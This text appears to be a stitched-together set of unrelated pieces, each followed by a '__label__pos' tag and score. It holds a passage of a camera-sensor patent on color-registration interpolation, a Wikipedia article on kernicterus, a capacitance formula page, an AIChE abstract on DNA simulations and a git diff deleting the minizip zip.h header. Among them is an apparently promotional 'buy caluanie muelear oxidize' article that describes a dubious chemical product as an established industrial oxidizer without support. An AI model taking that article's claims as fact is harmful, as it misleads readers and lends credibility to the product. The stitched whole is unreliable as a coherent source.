coefficient memory 509r. The products output by the multipliers 523, 524, 525, and 526 are added by the adder 527. As a result, the value V.sub.a of the red pixel is interpolated. Namely: The value of the blue pixel is interpolated by the interpolation circuit 508b in the same way. The red-pixel value and the blue-pixel value, thus interpolated, are input to a PS (Parallel-Serial) converter 510, along with the green-pixel value. The PS converter 510 combines the input pixel values, forming a color image signal, e.g., anNTSC television signal. The color image signal is output to a monitor 511, a printer 512, or a filing device 520. The CCD driver 516, the frame memories 507r, 507g, and 507b, the coefficient memories 509r and 509b, and the PS converter 510 are controlled by a system controller 517. As shown in FIG. 114B, the apparatus comprises coefficient calculators 513r and 513b. The calculator 513r comprises a correlator 514r and a coefficient-calculating circuit 515r. Similarly, the calculator 513b comprises a correlator 514b and acoefficient-calculating circuit 515b. For the sake of simplicity, only the coefficient calculator 513r will be described. In the coefficient calculator 513r, the correlator 514r detects a parallel vector s and a rotation vector r, which are input to the coefficient-calculating circuit 515r. The circuit 515r calculates coefficients C.sub.b, C.sub.c, C.sub.d, andC.sub.e from the vectors r and s. The displacement of an image of a color, with respect to an image of any other color, is detected in two factors, i.e., the parallel displacement and angle of rotation of a given pixel of the color image. To detect the displacement this way,reference areas a.sub.1, a.sub.2, a.sub.3, and a.sub.4 are set in the green image as is illustrated in FIG. 116A. These areas have centers p.sub.1, p.sub.2, p.sub.3, and p.sub.4, respectively. The reference areas are located symmetrically with respectto a point C, each spaced apart therefrom by a k-pixel distance. As shown in FIG. 116B, search areas b.sub.1, b.sub.2, b.sub.3, and b.sub.4 are set in the red image and the blue image. These areas b.sub.1 to b.sub.4 are searched for the positionscorresponding to the reference areas a.sub.1 to a.sub.4. From these positions, displacement vectors V1, V2, V3, and V4 corresponding to the reference areas a.sub.1 to a.sub.4 are detected. Each of these displacement vectors is defined as follows and asshown in FIG. 117, by a rotation vector r and a parallel vector s measured at position p1 with respect to the point C: where r-90 and r+90 are vectors obtained by rotating vectors r by -90.degree. and +90.degree., respectively. where .theta. is the angle of rotation. From the equation (13), the vectors s and r can be represented as follows: Thus, the parallel displacement and the rotation angle can be detected. The rotation angle .theta. is given: FIG. 118 shows a correlator 514 used in the thirty-seventh embodiment. In the correlator 514, a correlator 530 determines the correlation between the reference area a.sub.1 and the search area b.sub.1. Similarly, a correlator 531 detects thecorrelation between the reference area a.sub.2 and the search area b.sub.2 ; a correlator 532 the correlation between the reference area a.sub.3 and the search area b.sub.3 ; and a correlator 533 the correlation between the reference area a.sub.4 and thesearch area b.sub.4. The correlators 530, 531, 532, and 533 output displacement vectors V.sub.1, V.sub.2, V.sub.3, and V.sub.4. Various methods of determining the correlation between two areas have been proposed. Utilized in this embodiment is the method in which the absolute sum of the values of the pixel defining the first area is compared with that of the values ofthe pixels defining the second area. The displacement vectors V.sub.1, V.sub.2, V.sub.3, and V.sub.4 are supplied from the correlators 530 to 533 to an SR detector 534. The detector 543 performs the operation of the equations (16) and (17), detecting a parallel displacement s and arotation vector r. The rotation vector r is input to a .theta. detector 535. The detector 535 performs the operations of the equations (15) and (18) on the rotation vector r, calculating a rotation angle .theta.. The coefficient-calculating circuits 515r and 515b, which are identical and designed to calculate interpolation coefficients C.sub.b, C.sub.c, C.sub.d, and C.sub.e from the vector r and the angle .theta., will be described with reference to FIG.119. Either coefficient-calculating circuit performs linear interpolation, obtaining the value of a pixel A from the known values of pixels B, C, D, and E. As is evident from FIG. 119, the line BC (broken line) passing the pixel A extends at rightangles to the lines FG and DE, crossing the lines BC and DE shown in FIG. 119 at points F and G, respectively. Assume BF:FC=DG:GE=m:n, and FA:AG=p:q. Then, the value V.sub.f for the pixel F, and the value V.sub.g for the pixel G are: Hence, V.sub.a is given: Setting the inter-pixel distance at "1, " then m+n=p+q=1. Therefore, Va is calculated as follows: ##EQU3## Comparison of the equation (22) with the equation (13) will show that: The coordinates of the pixel A are (C.sub.x, C.sub.y). Then, the coordinates for the pixels B, C, D, and E can be represented by: Pixel B=(IC.sub.x, IC.sub.y) where IC.sub.x is the integral part of C.sub.x, and IC.sub.y is the integral part of C.sub.y. Position X.sub.r in the red image and position X.sub.b in the blue image, which correspond to position X.sub.g in the green image are identified as: where S.sub.r is the parallel vector between the red and green images, S.sub.b is the parallel vector between the blue and the green images, .theta..sub.r is the rotation angle of the red image, .theta..sub.b is the rotation angle of the blueimage, and X.sub.r, X.sub.g, X.sub.b are two-dimensional vectors whose elements are an x-coordinate and a y-coordinate. R(.theta. is given as follows: The coefficient-calculating circuits 515r and 515b, which are identical, have the structure illustrated in FIG. 120. As can be understood from FIG. 120, a coordinates-converting circuit 536 performs the operations of equations (25) and (26),outputting the coordinates C.sub.x and C.sub.y (real numbers) for the red and blue images. The coordinates C.sub.x and C.sub.y are input to integration circuits 537 and 538, respectively. The circuits 537 and 538 generate the integral part IC.sub.x ofC.sub.x and the integral part IC.sub.y of C.sub.y, respectively. These integral parts IC.sub.x and IC.sub.y are output from the coefficient-calculating circuit, and subtracters 539 and 540. The subtracter 539 subtracts IC.sub.x from C.sub.x suppliedfrom the coordinates-converting circuit 536, generating a coefficient m(=C.sub.x -IC.sub.x). The subtracter 540 subtracts IC.sub.y from C.sub.y supplied from the circuit 536, generating a coefficient p(=C.sub.y -IC.sub.y). The values m and p are inputto a coefficient calculator 541. The calculator 541 calculates interpolation coefficients C.sub.b, C.sub.c, C.sub.d, and C.sub.e from the coefficients m and p, by performing the operation of equation (23). The coefficient memory 509r will be described in detail, with reference to FIG. 121, and the other coefficient memory 509b will not be described in detail since it is identical to the memory 509r. As FIG. 121 shows, the coefficient memory 509r comprises memories 551, 552, 553, and 555 for storing the interpolation coefficients C.sub.E, C.sub.c, C.sub.d supplied from the coefficient-calculating circuit 515r, and memories 556 and 557 forstoring the coordinates IC.sub.x and IC.sub.y supplied from the circuit 515r. The operation of the thirty-seventh embodiment will now be explained with reference to FIG. 122. The embodiment executes two major steps. The first major step is to detect coefficients by means of the coefficient calculating sections 513r and513b and store the coefficients obtained by the sections 513r and 513b into the coefficient memories 509r and 509b. The second major step is to photograph an object to acquire image data. The sections 513r and 513b, which calculate coefficients andtherefore are useful in the first major step, need not be used in the second major step. The first major step will be described, with reference to FIG. 114. Assume that the object 501 is a test chart which is a black-and-white image. The red image, green image, and blue image obtained from the black-and-white image are greatlycorrelated. The displacement the image has with respect to the green image, and the displacement the blue image has with respect to the green image can, therefore, be calculated with high accuracy. It is desirable that the test chart have many spatialfrequency components so that accurate correlation signals may be obtained at various positions. The test chart 501 is photographed. To be more specific, the distance-measuring system (not shown) adjusts the focal distance of the optical system 502, and the photometer system (not shown) adjusts the exposure time of the CCDs 503r, 503g,503b. The optical image of the test chart 501 is applied via the system 502 to the color-separating prism 503. The prism 503 separates the input image into a red beam, a green beam, and a blue beam. The CCDs 503r, 503g, and 503b convert these beamsinto image signals. The image signals are amplified by the preamplifiers 504r, 504g, and 504b such that the white balance is maintained. The A/D converters 505r, 505g, and 505b convert the amplified signals to digital signals. The signal processors506r, 506g, and 506b perform y correction, edge-emphasis, or the like on the digital signals. The signals output by the signal processors 506r, 506g, and 506b are stored into the frame memories 507r, 507g, and 507b. The image signals read from the frame memories 507r and 507g are input to the coefficient calculator 513r. In the calculator 513r, the correlator 514r detects the reference areas a.sub.1, a.sub.2, a.sub.3, and a.sub.4 of the green image, and thesearch areas b.sub.1, b.sub.2, b.sub.3, and b.sub.4 of the red image. The correlator 514r also detects the parallel vector S.sub.r between the red image and the green image, and a rotation angle .theta..sub.r. The vector S.sub.r and the angle.theta..sub.r are supplied to the coefficient-calculating circuit 515r. The circuit 515r calculates the coordinates IC.sub.x, IC.sub.y of the red image which corresponds to the two-dimensional vector X.sub.g of the green image, and also calculatesinterpolation coefficients C.sub.b, C.sub.c, C.sub.d, and C.sub.e. The values output by the circuit 515r are stored at the specified addresses of the coefficient memory 509r. These values define the imaging area of the green image, over which the redimage, the green image, and the blue image overlap as is illustrated in FIG. 122. The imaging area (FIG. 122) is designated by the system controller 517 in accordance with the outputs of the correlators 514r and 514b. Instead, the imaging area may beset by a user. Meanwhile, the image signals read from the frame memories 507g and 507b are input to the coefficient calculator 513b which is identical in structure to the coefficient calculator 513r. The calculator 513b calculates the displacement between thegreen image and the blue image, the coordinates ICx, ICy of the imaging area of the blue image, and interpolation coefficients Cb, Cc, Cd, and Ce. The values output by the coefficient-calculating circuit 515b are stored at the is specified addresses ofthe coefficient memory 509b. Thus, the interpolation coefficients for the imaging area over which the red, green and blue images overlap are calculated and subsequently stored in the coefficient memories 509r and 509b, thereby completing the first major step of registeringcoefficients in the memories 509r and 509b. The first major step is carried out during the manufacture of the image processing apparatus. The coefficients are already stored in the memories 509r and 509b when the apparatus is delivered to a user (i.e., a photographer). Therefore, thecoefficient calculators 513r and 513b can be removed from the apparatus after the coefficients have been calculated and registered in the memories 509r and 509b. The second major step, i.e., photographing an object, will be explained, with reference to FIG. 114, on the assumption that the coefficient calculators 513r and 513b have been removed from the apparatus. First, a photographer gets the image of an object 501 with the imaging area defined above, and pushes the shutter-release button (not shown). As a result, the CCDs 503r, 503g, and 503b generate red-image data, green-image data, and blue-imagedata, respectively. These image data items are stored into the frame memories 507r, 507g, and 507b. Then, the system controller 517 designates coordinates of a position of the green image, which is located in the imaging area. The coefficients related to the position designated, i.e., the coordinates IC.sub.x and IC.sub.y and the interpolationcoefficients C.sub.b, C.sub.c, C.sub.d, and C.sub.d, are read from the coefficient memory 509r and supplied to the interpolation circuit 508r. The red-image data is read from the frame memory 507r in accordance with the coordinates IC.sub.x and IC.sub.yand input to the interpolation circuit 508r. The circuit 508r interpolates the value for the red pixel located at that position of the green image which the system controller 517 has designated. In the meantime, the coefficients related to the position designated, i.e., the coordinates IC.sub.x and IC.sub.y and the interpolation coefficients C.sub.b, C.sub.c, C.sub.d, and C.sub.d, are read from the coefficient memory 509b and supplied tothe interpolation circuit 508b. The blue-image data is read from the frame memory 507b in accordance with the coordinates IC.sub.x and IC.sub.y and input to the interpolation circuit 508b. The circuit 508b interpolates the value for the blue pixellocated at that position of the green image which the system controller 517 has designated. The value of a green pixel is supplied from the frame memory 507g to the PS converter 510, the value of the red pixel is input from the interpolation circuit 508r to the PS converter 510, and the value of the blue pixel is input from theinterpolation circuit 508b to the PS converter 510. The converter 510 combines the three pixel values, forming a color image signal. The color image signal is output to the monitor 511, the printer 512, or the filing device 520. As can be understood from the foregoing, the thirty-seventh embodiment can provide a three-section color camera which con form a high-resolution color image with no color distortion. Since the interpolation circuits 508r and 508b compensate color distortion resulting form the mutual displacement of the CCDs 503r, 503g, and 503b, the positions of the CCDs need not be adjusted as in the conventional apparatus. That is, noregistration of solid-state imaging devices is required. Since the image signals produced by the CCDs are corrected, the thirty-seventh embodiment can form a high-resolution color image even if the CCDs are not positioned with precision. Further, themutual displacement of a red image, a green image, and a blue image can be accurately detected. This is because the red image and the blue image are compared with the green image which is greatly correlative to both the red image and the blue image. In the thirty-seventh embodiment, four reference areas are utilized as shown in FIGS. 116A and 116B in order to detect the displacement of the red image and the blue image with respect to the green image. Instead, only two reference areas,either the areas a.sub.1 and a.sub.3 or the areas a.sub.2 and a.sub.3, may be used for that purpose. Alternatively, more than four reference areas may be set in the green image. Moreover, the interpolation circuits 508r and 508b, which perform linear interpolation, may be replaced by circuits designed to effect spline interpolation or SINNG interpolation. Further, the coefficient calculators 513r and 513b may be connected to the camera by means of connectors. In this case, the calculators 513r and 513b can be disconnected from the camera after the coefficients they have calculated are writteninto the coefficient memories 509r and 509b. The two coefficient calculators 513r and 513b can be replaced by a single calculator of the same type, provided that this calculator can be connected alternatively to the correlators 514r and 514b by means of a changeover switch. Another image processing apparatus, which is a thirty-eighth embodiment of the present invention, will be described with reference to FIG. 123. This embodiment is similar to the thirty-seventh embodiment shown in FIG. 114. The same componentsas those shown in FIG. 114 are denoted at the same reference numerals in FIG. 123, and will not be described in detail. The thirty-eighth embodiment is characterized in that r.theta. memories 560 and 561 are used in place of the coefficient memories 509r and 509b. The memory 560 stores only the vector r and the angle .theta. output by the correlator 514r, andthe memory 561 stores only the vector r and the angle .theta. output by the correlator 514b. The memories 560 and 561 suffice to have a storage capacity far less than that of the memories 509r and 509b which need to store a variety of coefficientscalculated by the coefficient-calculating circuits 515r and 515b. In this case, however, it is necessary for the circuits 515r and 515b to calculate interpolation coefficients and coordinate data in the second major step of taking a picture of the testchart 501. An image processing apparatus according to a thirty-ninth embodiment of the invention will be described, with reference to FIGS. 124, 125, and 126. This embodiment is identical to the thirty-seventh embodiment, except for the features shown inFIGS. 124 and 125. The thirty-ninth embodiment is characterized in that less data is stored in each coefficient memory 509 than in the thirty-seventh embodiment and that the apparatus can yet operate at as high a speed as the thirty-seventh embodiment. As described above, it is possible with the thirty-seventh embodiment to interpolate a position A (C.sub.x, C.sub.y) from sets of coordinates which are presented in real numbers. Since the coordinates of the position A, thus interpolated, arereal numbers, there are countless interpolation coefficients C.sub.b, C.sub.c, C.sub.d, and C.sub.e. In the thirty-ninth embodiment, it is assumed that one image consists of L.times.L blocks having the same size, and the interpolation coefficient forthe coordinates of the center of each block is used as interpolation coefficient for the image block. Therefore, L.sub.2 interpolation coefficients are required in the thirty-ninth embodiment. Serial numbers, or block numbers, "1" to "L.sub.2, " areassigned to the L.sub.2 image blocks, respectively. The block numbers and the L.sub.2 interpolation coefficients are stored in a memory, in one-to-one association. The thirty-ninth embodiment comprises a coefficient-calculating circuit 515a shown in FIG. 124 and a coefficient memory 509a shown in FIG. 125. As FIG. 124 shows, the coefficient-calculating circuit 515a has a block number calculator 562 whichis used in place of the coefficient calculator 541 (FIG. 120). The block number calculator 562 calculates a block number N from values m and p, as follows: where 0.ltoreq.m<1, 0.ltoreq.p<1. As FIG. 125 shows, the coefficient memory 509a comprises memories 563, 564, 565, 566, 567, 568, and 569. The memories 563, 564, and 565 are used to store the coordinate IC.sub.x, the coordinate IC.sub.y and the coefficient N, respectively, whichthe coefficient calculator 541 has generated. The memories 566, 567, 568, and 569 are provided for storing interpolation coefficients C.sub.b, C.sub.c, C.sub.d, and C.sub.e, respectively, which are associated with the image blocks. The memories 566,567, 568, and 569 have L.sup.2 memory cells each, as compared to the memories used in the thirty-seventh embodiment which have as many memory cells as the pixels defining the imaging area. Obviously, the storage capacity of the memories 566, 567, 568,and 569 is far smaller than is required in the thirty-seventh embodiment. The storage capacity of each coefficient memory can be reduced since the interpolation coefficients for symmetrical pixels are identical. In the thirty-ninth embodiment, the interpolation circuits process image signals, thereby compensating the mutual displacement of images formed the imaging devices. No mechanical registration of the imaging devices is therefore required. Thethirty-ninth embodiment can be applied to a low-cost color image processing apparatus which can form a high-resolution color image, even if its imaging devices are not positioned with high precision. Additional advantages and modifications will readily occur to those skilled in the art. Therefore, the invention in its broader aspects is not limited to the specific details, and representative devices shown and described herein. Accordingly,various modifications may be made without departing from the spirit or scope of the general inventive concept as defined by the appended claims and their equivalents. * * * * *       Recently Added Patents Minimizing mismatch during compensation Light receiving element with offset absorbing layer Systems and methods for performing live chat functionality via a mobile device Medical injector People engine optimization Actuators and moveable elements with position sensing Dynamic learning method and adaptive normal behavior profile (NBP) architecture for providing fast protection of enterprise applications   Randomly Featured Patents Method and apparatus for stapling an annuloplasty band in-situ Hand-held shower Input circuit for an integrated circuit Semiconductor device Concurrent multiple data rate communications in a wireless local area network IRNA agents targeting VEGF Strain tolerant corrosion protecting coating and spray method of application Estimating channel impulse response and equalizer coefficients in UWB communication systems Removal and deactivation of viruses from blood Method and apparatus for providing a robust object finder  
__label__pos
0.847668
Kernicterus From Wikipedia, the free encyclopedia Jump to: navigation, search Kernicterus Kernicterus.jpg MRI of the head. Hyperintense basal ganglia lesions on T2-weighted images. Classification and external resources Specialty pediatrics ICD-10 P57 ICD-9-CM 773.4, 774.7 DiseasesDB 7161 MedlinePlus 003243 eMedicine ped/1247 Patient UK Kernicterus MeSH D007647 Kernicterus is a bilirubin-induced brain dysfunction. The term was coined in 1904 by Schmorl. Bilirubin is a naturally occurring substance in the body of humans and many other animals, but it is neurotoxic when its concentration in the blood is too high, a condition known as hyperbilirubinemia. Hyperbilirubinemia may cause bilirubin to accumulate in the grey matter of the central nervous system, potentially causing irreversible neurological damage. Depending on the level of exposure, the effects range from clinically unnoticeable to severe brain damage and even death. When hyperbilirubinemia increases past a mild level, it leads to jaundice, raising the risk of progressing to kernicterus. When this happens in adults, it is usually because of liver problems. Newborns are especially vulnerable to hyperbilirubinemia-induced neurological damage, because in the earliest days of life, the young and still-developing liver is heavily exercised by the breakdown of fetal hemoglobin as it is replaced with adult hemoglobin. Mildly elevated serum bilirubin levels are common in newborns, and neonatal jaundice is not unusual, but bilirubin levels must be carefully monitored in case they start to climb, in which case more aggressive therapy is needed, usually via light therapy but sometimes even via exchange transfusion. Classification[edit] Acute bilirubin encephalopathy (ABE)[edit] ABE is an acute state of elevated bilirubin in the central nervous system. Clinically, it encompasses a wide range of symptoms. These include lethargy, decreased feeding, hypotonia or hypertonia, a high-pitched cry, spasmodic torticollis, opisthotonus, setting sun sign, fever, seizures, and even death. If the bilirubin is not rapidly reduced, ABE quickly progresses to chronic bilirubin encepalopathy. Chronic bilirubin encephalopathy (CBE)[edit] CBE is a chronic state of severe bilirubin-induced neurological lesions. Reduction of bilirubin in this state will not reverse the sequelae. Clinically, manifestations of CBE include: 1. movement disorders - athetoid cerebral palsy and or dystonia, 2. auditory dysfunction - auditory neuropathy (ANSD) 3. oculomotor impairments (nystagmus, strabismus, Impaired upward or downward gaze, and/or cortical visual impairment), 4. dental enamel hypoplasia/dysplasia of the deciduous teeth, 5. Gastroesophageal reflux, 6. impaired digestive function. These impairments are associated with lesions in the basal ganglia, auditory nuclei of the brain stem, and oculomotor nuclei of the brain stem. Subtle bilirubin encephalopathy (SBE)[edit] SBE is a chronic state of mild bilirubin-induced neurological dysfunction. Clinically, this may result in neurological, learning and movement disorders, isolated hearing loss and auditory dysfunction. • In the past it was thought that kernicterus (KI) could cause MR (mental retardation). This was assumed due to difficulty with hearing, that could not be detected in a normal audiogram accompanied by impairments of speech. With advances in technology, this has proven to not be the case as those living with KI have repeatedly demonstrated their intelligence using Augmentative Communication devices[citation needed]. Causes[edit] Unconjugated hyperbilirubinemia during the neonatal period describes the history of nearly all individuals who suffer from kernicterus. It is thought that the blood–brain barrier is not fully functional in neonates and therefore bilirubin is able to cross the barrier. Moreover, neonates have much higher levels of bilirubin in their blood due to: 1. Although the severe anemia of erythroblastosis fetalis is usually the cause of death, many children who barely survive the anemia exhibit permanent mental impairment or damage to motor areas of the brain because of precipitation of bilirubin in the neuronal cells, causing destruction of many, a condition called kernicterus. the rapid breakdown of fetal red blood cells immediately prior to birth (and subsequent replacement by normal adult human red blood cells). This breakdown of fetal red blood cells releases large amounts of bilirubin. Following on from this 2. Neonates cannot metabolize and eliminate bilirubin. The sole path for bilirubin elimination is through the uridine diphosphate glucuronosyltransferase isoform 1A1 (UGT1A1) proteins that perform a (SN2 conjugation) reaction called "glucuronidation". This reaction adds a large sugar to the bilirubin and makes it more water-soluble, so more readily excreted via the urine and/or the feces. The UGT1A1 enzymes are present, but not active until several months after birth in the newborn liver. Apparently, this is a developmental compromise since the maternal liver and placenta perform glucuronidation for the fetus. In the early 1980s a late-fetal change (30 – 40 weeks of gestation) in hepatic UGT1A1 (from 0.1% to 1.0% of adult activity levels) and post-natal changes that are related to birth age not gestational age were reported. Similar development of activities to pan-specific substrates were observed except for serotonin (1A4), where adult activities were observed in fetal (16 – 25 weeks) and neonatal liver up to 10 days old. More recently, individual UGT isoform development in infants and young children, including two fetal liver samples, were analyzed and showed that pediatric levels of mRNA and protein for UGT1A1 did not differ from adults, but activities were lower. Hence, the effects of UGT1A1 developmental delay in activation have been illuminated over the last 20–30 years. The molecular mechanism(s) for activating UGT1A1 remain unknown. 3. Administration of aspirin to neonates and infants. Aspirin displaces the bilirubin that was non-covalently attached to albumin in the blood stream, thus generating an increased level of free bilirubin which can cross the developing blood brain barrier. This can be life-threatening. Bilirubin is known to accumulate in the gray matter of neurological tissue where it exerts direct neurotoxic effects. It appears that its neurotoxicity is due to mass-destruction of neurons by apoptosis and necrosis. Risk factors[edit] Gilbert's syndrome and G6PD deficiency occurring together especially increases the risk for kernicterus.[1] Prevention[edit] The only effective way at preventing kernicterus is to lower the serum bilirubin levels either by phototherapy or exchange transfusion. Visual inspection is never sufficient; therefore, it is best to use a bilimeter or blood test to determine a baby's risk for developing kernicterus. These numbers can then be plotted on the Bhutani nomogram. Treatment[edit] Currently no effective treatment exists for kernicterus. Future therapies may include neuroregeneration. A handful of patients have undergone deep brain stimulation, and experienced some benefit. Drugs such as baclofen, clonazepam, and artane are often used to manage movement disorders associated with kernicterus. Proton pump inhibitors are also used to help with reflux. Cochlear implants and hearing aids have also been known to improve the hearing loss that can come with kernicterus (auditory neuropathy - ANSD). References[edit] 1. ^ Cappellini MD, Di Montemuros FM, Sampietro M, Tavazzi D, Fiorelli G (1999). "The interaction between Gilbert's syndrome and G6PD deficiency influences bilirubin levels". British journal of haematology. 104 (4): 928–9. doi:10.1111/j.1365-2141.1999.1331a.x. PMID 10192462.  External links[edit]
__label__pos
0.924392
The Enigmatic World of Caluanie: A Deep Dive into a Lesser-Known Chemical In the realm of chemicals, few substances have the mystique and enigma of buy caluanie muelear oxidize . Often overshadowed by its more famous counterparts like sulfuric acid or hydrochloric acid, Caluanie is a compound that warrants a closer look due to its unique properties and intriguing applications. What is Caluanie? Caluanie, scientifically known as Caluanie Muelear Oxidize, is a chemical compound used primarily as an industrial oxidizer. Its name might not be familiar to the average person, but in certain sectors, it’s an essential tool. The chemical is known for its powerful oxidizing properties, making it valuable in various industrial processes, including those related to metal processing and waste treatment. Properties and Applications One of the most notable characteristics of Caluanie is its potency. It is a highly corrosive substance that can cause severe damage to both living tissues and materials. As such, it must be handled with extreme caution, adhering to strict safety protocols to prevent accidents. Despite its dangerous nature, Caluanie is employed in several critical industrial applications. It’s used in: 1. Metal Processing: Caluanie is used to oxidize metals in various stages of production. This helps in purifying metals and removing impurities, which is essential for creating high-quality metal products. 2. Waste Treatment: The compound plays a role in breaking down hazardous waste materials, particularly those containing organic compounds. Its oxidizing ability helps in neutralizing these substances, rendering them less harmful. 3. Chemical Synthesis: In the world of synthetic chemistry, Caluanie is sometimes used as a reagent in various chemical reactions. Its strong oxidizing properties make it useful in certain synthetic pathways that require high reactivity. Safety and Handling Given its corrosive nature, safety is paramount when dealing with Caluanie. Proper protective equipment, including gloves, goggles, and respiratory protection, is essential. Additionally, it should be stored in appropriate containers and environments to prevent accidental exposure and ensure safe handling. The Cultural and Historical Context Though Caluanie is primarily known for its industrial uses, it has also gained some notoriety in popular culture and internet lore. The compound is sometimes featured in discussions about hazardous chemicals due to its intense reactivity and the dramatic effects it can have if mishandled. Historically, the use of such chemicals has often been shrouded in secrecy and caution, partly due to their dangerous nature and partly due to the intricate processes involved in their handling. This aura of mystery adds to the allure of Caluanie, making it a fascinating subject of study for both chemists and enthusiasts alike. Conclusion Caluanie Muelear Oxidize may not be a household name, but its role in the industrial world is significant. Its powerful oxidizing properties make it an invaluable tool in metal processing, waste treatment, and chemical synthesis. However, the need for careful handling and stringent safety measures underscores the potential dangers associated with such a potent chemical. As with many substances that straddle the line between utility and hazard, understanding and respect are key to harnessing its benefits while minimizing risks. Related Posts Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.999708
Capacitance Written by Jerry Ratzlaff on . Posted in Electromagnetism Capacitance is the ability to hold an electric charge. Abbreviated as \(C\) or \(CAP\) FORMULA Where: \(C\) = capacitance \(Q\) = electrical charge that is stored on the capacitor \(V\) = potential difference (the voltage between the capacitor's plates) Solve for: \(Q = CV \) \(V = \frac { Q } { C }\)
__label__pos
0.999595
(230s) Dynamics of Linear and Comb DNA Solutions Using Efficient Brownian Dynamics Techniques | AIChE (230s) Dynamics of Linear and Comb DNA Solutions Using Efficient Brownian Dynamics Techniques Authors  Saadat, A. - Presenter, University of Tennessee Khomami, B., University of Tennessee Mai, D. J., University of Illinois at Urbana-Champaign Schroeder, C. M., University of Illinois at Urbana-Champaign Excluded volume (EV) and hydrodynamic interactions (HI) play a central role in macromolecular dynamics under equilibrium and non-equilibrium settings, specifically in determining the concentration dependence of static and dynamic properties of semidilute polymer solutions. The high computational cost of incorporating the influence of HI in mesoscale Brownian dynamics simulations (BDS) of polymeric solutions has motivated much research on development of high-fidelity and cost efficient techniques. In this work, a Krylov subspace based technique is implemented to enable fast calculations of single chain dynamics with computational expense scaling as O(Nb2) where Nb is the number of beads in the bead-spring micromechanical model [1]. For simulations of coupled multichain systems, a matrix-free approach for calculation of HI is implemented which leads to O(NlogN) scaling of simulation time, where N is the total number of beads in the periodic box [2]. To investigate the properties of DNA solutions using coarse-grained bead-spring chains, a new technique is developed on the basis of properties of exact worm-like chain (WLC). In this approach, the correct correlation along the chain is modeled through the introduction of a bending potential and the spring force-law is obtained using asymptotic behavior of WLC at small and large forces. Using this model, the relaxation and stretching dynamics of linear and comb DNA molecules are evaluated and compared against experimental data [3]. References: [1] A. Saadat and B. Khomami, J. Chem. Phys., 140, 184903 (2014). [2] A. Saadat and B. Khomami, Phys. Rev. E, 92, 033307 (2015). [3] D. J. Mai, A. B Marciel, C. E. Sing, C. M. Schroeder, ACS Macro Lett., 4, 446 (2015).
__label__pos
0.869088
corinthia-commits mailing list archives Site index · List index Message view « Date » · « Thread » Top « Date » · « Thread » From [email protected] Subject [18/55] [abbrv] incubator-corinthia git commit: removed zlib Date Fri, 24 Apr 2015 16:17:45 GMT http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/minizip/zip.h ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/minizip/zip.h b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/minizip/zip.h deleted file mode 100644 index 8aaebb6..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/minizip/zip.h +++ /dev/null @@ -1,362 +0,0 @@ -/* zip.h -- IO on .zip files using zlib - Version 1.1, February 14h, 2010 - part of the MiniZip project - ( http://www.winimage.com/zLibDll/minizip.html ) - - Copyright (C) 1998-2010 Gilles Vollant (minizip) ( http://www.winimage.com/zLibDll/minizip.html ) - - Modifications for Zip64 support - Copyright (C) 2009-2010 Mathias Svensson ( http://result42.com ) - - For more info read MiniZip_info.txt - - --------------------------------------------------------------------------- - - Condition of use and distribution are the same than zlib : - - This software is provided 'as-is', without any express or implied - warranty. In no event will the authors be held liable for any damages - arising from the use of this software. - - Permission is granted to anyone to use this software for any purpose, - including commercial applications, and to alter it and redistribute it - freely, subject to the following restrictions: - - 1. The origin of this software must not be misrepresented; you must not - claim that you wrote the original software. If you use this software - in a product, an acknowledgment in the product documentation would be - appreciated but is not required. - 2. Altered source versions must be plainly marked as such, and must not be - misrepresented as being the original software. - 3. This notice may not be removed or altered from any source distribution. - - --------------------------------------------------------------------------- - - Changes - - See header of zip.h - -*/ - -#ifndef _zip12_H -#define _zip12_H - -#ifdef __cplusplus -extern "C" { -#endif - -//#define HAVE_BZIP2 - -#ifndef _ZLIB_H -#include "zlib.h" -#endif - -#ifndef _ZLIBIOAPI_H -#include "ioapi.h" -#endif - -#ifdef HAVE_BZIP2 -#include "bzlib.h" -#endif - -#define Z_BZIP2ED 12 - -#if defined(STRICTZIP) || defined(STRICTZIPUNZIP) -/* like the STRICT of WIN32, we define a pointer that cannot be converted - from (void*) without cast */ -typedef struct TagzipFile__ { int unused; } zipFile__; -typedef zipFile__ *zipFile; -#else -typedef voidp zipFile; -#endif - -#define ZIP_OK (0) -#define ZIP_EOF (0) -#define ZIP_ERRNO (Z_ERRNO) -#define ZIP_PARAMERROR (-102) -#define ZIP_BADZIPFILE (-103) -#define ZIP_INTERNALERROR (-104) - -#ifndef DEF_MEM_LEVEL -# if MAX_MEM_LEVEL >= 8 -# define DEF_MEM_LEVEL 8 -# else -# define DEF_MEM_LEVEL MAX_MEM_LEVEL -# endif -#endif -/* default memLevel */ - -/* tm_zip contain date/time info */ -typedef struct tm_zip_s -{ - uInt tm_sec; /* seconds after the minute - [0,59] */ - uInt tm_min; /* minutes after the hour - [0,59] */ - uInt tm_hour; /* hours since midnight - [0,23] */ - uInt tm_mday; /* day of the month - [1,31] */ - uInt tm_mon; /* months since January - [0,11] */ - uInt tm_year; /* years - [1980..2044] */ -} tm_zip; - -typedef struct -{ - tm_zip tmz_date; /* date in understandable format */ - uLong dosDate; /* if dos_date == 0, tmu_date is used */ -/* uLong flag; */ /* general purpose bit flag 2 bytes */ - - uLong internal_fa; /* internal file attributes 2 bytes */ - uLong external_fa; /* external file attributes 4 bytes */ -} zip_fileinfo; - -typedef const char* zipcharpc; - - -#define APPEND_STATUS_CREATE (0) -#define APPEND_STATUS_CREATEAFTER (1) -#define APPEND_STATUS_ADDINZIP (2) - -extern zipFile ZEXPORT zipOpen OF((const char *pathname, int append)); -extern zipFile ZEXPORT zipOpen64 OF((const void *pathname, int append)); -/* - Create a zipfile. - pathname contain on Windows XP a filename like "c:\\zlib\\zlib113.zip" or on - an Unix computer "zlib/zlib113.zip". - if the file pathname exist and append==APPEND_STATUS_CREATEAFTER, the zip - will be created at the end of the file. - (useful if the file contain a self extractor code) - if the file pathname exist and append==APPEND_STATUS_ADDINZIP, we will - add files in existing zip (be sure you don't add file that doesn't exist) - If the zipfile cannot be opened, the return value is NULL. - Else, the return value is a zipFile Handle, usable with other function - of this zip package. -*/ - -/* Note : there is no delete function into a zipfile. - If you want delete file into a zipfile, you must open a zipfile, and create another - Of couse, you can use RAW reading and writing to copy the file you did not want delte -*/ - -extern zipFile ZEXPORT zipOpen2 OF((const char *pathname, - int append, - zipcharpc* 